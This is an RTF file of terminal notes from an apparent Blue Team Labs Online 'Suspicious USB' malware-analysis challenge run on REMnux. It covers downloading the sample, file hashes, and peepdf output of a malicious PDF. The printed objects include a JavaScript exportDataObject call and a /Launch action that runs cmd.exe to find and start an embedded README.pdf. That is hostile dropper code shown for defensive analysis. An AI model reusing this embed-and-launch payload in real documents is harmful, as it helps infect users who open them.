{\rtf1\ansi\ansicpg1252\cocoartf2820
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 remnux@remnux:~$ wget https://blueteamlabs.online/storage/files/aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYPXC.zip\
--2024-11-18 23:14:44--  https://blueteamlabs.online/storage/files/aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYPXC.zip\
Resolving blueteamlabs.online (blueteamlabs.online)... 18.130.215.145\
Connecting to blueteamlabs.online (blueteamlabs.online)|18.130.215.145|:443... connected.\
HTTP request sent, awaiting response... 200 OK\
Length: 122798 (120K) [application/zip]\
Saving to: \'91aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYPXC.zip\'92\
\
aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYP 100%[=========================================================================>] 119.92K   777KB/s    in 0.2s    \
\
2024-11-18 23:14:44 (777 KB/s) - \'91aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYPXC.zip\'92 saved [122798/122798]\
\
remnux@remnux:~$ ls\
aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYPXC.zip  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos\
remnux@remnux:~$ unzip aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYPXC.zip \
Archive:  aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYPXC.zip\
   creating: BTLO Suspicious USB/\
[aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYPXC.zip] BTLO Suspicious USB/BTLO.txt password: \
password incorrect--reenter: \
  inflating: BTLO Suspicious USB/BTLO.txt  \
  inflating: BTLO Suspicious USB/USB.zip  \
remnux@remnux:~$ ls\
 aqCyykCIBZVselBnncQ0om8ADYSUMYa8AC8NYPXC.zip  'BTLO Suspicious USB'   Desktop   Documents   Downloads   Music   Pictures   Public   Templates   Videos\
remnux@remnux:~$ cd BTLO\\ Suspicious\\ USB/\
remnux@remnux:~/BTLO Suspicious USB$ cat BTLO.txt\
This FREE challenge is owned and provided by https://blueteamlabs.online.\
Please don't distribute these files outside of our platform - we give them away for free anyway.remnux@remnux:~/BTLO Suspicious USB$ ^C\
remnux@remnux:~/BTLO Suspicious USB$ \
\
\
c0d2fd7e0abae45346c62ad796228179a5f5f0e995a35d7282829d1202444c87  autorun.inf\
c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43  README.pdf\
\
\
PPDF> object 27\
\
<< /S /JavaScript\
/JS this.exportDataObject(\{ cName: "README", nLaunch: 0 \});\
/Type /Action >>\
\
PPDF> object 28\
\
<< /S /Launch\
/Type /Action\
/Win << /F cmd.exe\
/D c:\\windows\\system32\
/P /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\README.pdf" (cd "My Documents"))&(if exist "Documents\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)}